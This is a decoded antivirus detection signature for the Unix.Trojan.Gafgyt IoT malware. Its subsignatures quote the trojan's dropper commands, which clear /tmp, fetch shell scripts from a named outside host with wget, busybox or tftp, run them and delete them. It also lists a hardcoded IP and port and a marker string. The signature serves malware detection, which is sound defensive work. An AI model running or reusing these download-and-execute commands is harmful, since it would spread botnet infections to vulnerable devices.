VIRUS NAME: Unix.Trojan.Gafgyt-9876370-0
TDB: Engine:51-255,Target:6
LOGICAL EXPRESSION: 0&1&2&3&4
 * SUBSIG ID 0
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
cd /tmp || cd /var/run;rm -f *;wget http://teamspeak4life.cf/gtop.sh || busybox wget http://teamspeak4life.cf/gtop.sh; sh gtop.s
 * SUBSIG ID 1
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
h; rm -f *.sh;tftp teamspeak4life.cf -c get tftp.sh;sh tftp.sh;rm -rf tftp.sh
 * SUBSIG ID 2
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
/bin/busybox;echo -e '\147\141\171\146\147\164'
 * SUBSIG ID 3
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
185.112.249.43:213
 * SUBSIG ID 4
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
VULN FOUND!
